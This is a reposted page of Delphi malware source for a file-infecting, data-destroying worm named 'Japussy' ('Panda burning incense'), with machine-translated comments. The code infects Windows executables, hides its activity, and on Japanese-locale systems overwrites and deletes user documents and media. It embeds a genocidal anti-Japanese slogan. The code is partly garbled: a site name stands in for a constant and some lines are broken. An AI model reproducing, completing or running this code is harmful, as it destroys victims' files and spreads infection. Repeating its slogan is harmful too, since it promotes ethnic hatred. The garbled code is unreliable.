Panda burning incense source code

program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
zencart.mesite = 82432; //The size of the virus body
IconOffset = $12EB8; //The offset of the main icon of the PE file

//The size obtained by compiling on my Delphi5 SP1, other versions of Delphi may be different
//Find the hexadecimal string of 2800000020 to find the offset of the main icon

{
HeaderSize = 38912; //The size of the virus body compressed by
Upx IconOffset = $92BC; //The offset of the main icon of the PE file compressed by Upx

//Upx 1.24W usage: upx -9 --8086 Japussy.exe
}
IconSize = $2E8; //The size of the main icon of the PE file -- 744 bytes
IconTail = IconOffset + IconSize; //The tail
ID of the main icon of the PE file = $44444444; //infection flag

//Trash code for writing
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' +
'*** W32. Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall; external 'Kernel32.dll'; //function declaration
var
TmpFile: string;
Si: STARTUPINFO ;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; //Japanese OS mark
{ determine whether it is Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{copy between streams}
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src .Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{Separate the host file from the infected PE file for use}
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
dStream := TFileStream.Create(FileName, fmCreate);
try
sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{send poisonous mail}
procedure SendMail;
begin
//Which man is willing to finish it?
end;
{infect PE file}
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[ 0..1] of Char;
begin
try //If an error occurs, the file is being used, exit
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //it is not infected
Exit;
Infected := False;
IsPE : = False;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to $108 do //Check PE file header
begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then //PE mark
begin
IsPE := True; / / is a PE file
Break;
end;
end;
SrcStream.Seek(-4, soFromEnd); //Check infection flag
SrcStream.Read(iID, 4);
if (iID = ID) or (SrcStream.Size < 10240) then / / Too small files are not infected
Infected := True;
finally
SrcStream.Free;
end;
if Infected or (not IsPE) then //
Exit Exit if infected or not a PE file;
IcoStream := TMemoryStream.Create;
DstStream : = TMemoryStream.Create;
try
aIcon := TIcon.Create;
try
//Get the main icon (744 bytes) of the infected file and store it in the stream
aIcon.ReleaseHandle;
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
aIcon.SaveToStream(IcoStream);
finally
aIcon.Free;
end;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
//Header file
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
//Write the data before the main icon of the virus body
CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
//Write the main icon of the current program
CopyStream( IcoStream, 22, DstStream, IconOffset, IconSize);
//Write the data between the main icon of the virus body and the tail of the virus body
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
//Write the host program
CopyStream( SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
//Write the infected tag
DstStream.Seek(0, 2);
iID := $44444444;
DstStream.Write(iID, 4);
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SaveToFile(FileName); //replace the host file
DstStream.Free;
end;
except;
end;
end;
{ delete the target file after writing it to junk code}
procedure SmashFile(FileName: string);
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName), 0 ); //Remove read-only attribute
FileHandle := FileOpen(FileName, fmOpenWrite); //Open file
try
Size := GetFileSize(FileHandle, nil); //File size
i := 0;
Randomize;
Max := Random(15 ); //Random number of times to write garbage code
if Max < 5 then
Max := 5;
Mass := Size div Max; //The size of each interval block
Len := Length(Catchword);
while i < Max do
begin
FileSeek(FileHandle, i * Mass, 0); //Locate
//Write garbage code to completely destroy the file
FileWrite(FileHandle, Catchword, Len);
Inc(i);
end;
finally
FileClose(FileHandle); //Close the file
end;
DeleteFile(PChar(FileName)) ; //delete
except
end;
end;
{ get list of writable drives}
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 0 to 25 do / / Traverse 26 letters
begin
D := Chr(i + 65);
Str := D + ':';
DiskType := GetDriveType(PChar(Str));
//Get local disk and network disk
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result := Result + D;
end;
end;
{ Traverse directory, infect and destroy file}
procedure LoopFiles(Path, Mask: string);
var
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
if ( SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 0 //not a directory
else if (SearchRec.Attr = 16) and ( SearchRec.Name <> '.') and
(SearchRec.Name <> '..') then
Result := 1 // not the root directory
else Result := 2; //is the root directory
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin
repeat
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //Adjust the message queue , to avoid suspicion
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + SearchRec.Name;
Ext := UpperCase(ExtractFileExt(Fn));
if (Ext = '.EXE') or (Ext = '.SCR' ) then
begin
InfectOneFile(Fn); //infect executable file
end
else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
begin
//infect HTML and ASP file, write the Base64-encoded virus to
//infect all users who browse this page
//Which big brother is willing to complete it?
end
else if Ext = '.WAB'



else if Ext = '.ADC' then //Foxmail address autocomplete file
begin
//Get Foxmail email address
end
else if Ext = 'IND' then //Foxmail address book file
begin
//Get Foxmail email address
end
else
begin
if IsJap then //is Japanese operating system
begin
if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
(Ext = '.MP3') or (Ext = '. RM') or (Ext = '.RA') or
(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
(Ext = '.MPEG') or ( Ext = '.ASF') or (Ext = '.JPG') or
(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
(Ext = '.PDF ') or (Ext = '.CHM') or (Ext = '.AVI') then
SmashFile(Fn); //Destroy the file
end;
end;
end;
//Sleep for 200 milliseconds after infecting or deleting a file to avoid suspicion due to high CPU usage
Sleep(200);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
SubDir := TStringList.Create;
if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
Count := SubDir.Count - 1;
for i := 0 to Count do
LoopFiles(Path + SubDir.Strings + '', Mask);
FreeAndNil(SubDir);
end;
{ 遍历磁盘上所有的文件 }
procedure InfectFiles;
var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //日文操作系统
IsJap := True; //** Go!
DriverList := GetDrives; //get writable disk list
Len := Length(DriverList);
while True do //infinite loop
begin
for i := Len downto 1 do //traverse each disk drive
LoopFiles(DriverList + ': ', '*.*'); //Infected
SendMail; //Send poisonous mail
Sleep(1000 * 60 * 5); //Sleep for 5 minutes
end;
end;
{main program starts}
begin
if IsWin9x then // Yes Win9x
RegisterServiceProcess(GetCurrentProcessID, 1) //Register as a service process
else //WinNT
begin
//The remote thread is mapped to the Explorer process
//Which Xiongtai is willing to complete it?
end;
//If it is the original virus body itself
if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
InfectFiles //Infection and emailing
else //It has been parasitized on the host program and starts to work
begin
TmpFile := ParamStr(0); //Create a temporary file
Delete(TmpFile, Length(TmpFile) - 4, 4);
TmpFile := TmpFile + #32 + '.exe'; //The real host file, one more space
ExtractFile(TmpFile); //Separated
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); //Create
InfectFiles of the new process running ; //infection and emailing
end;
end.

www.zencartme.me/archives/3121

Guess you like

Origin http://10.200.1.11:23101/article/api/json?id=326892547&siteId=291194637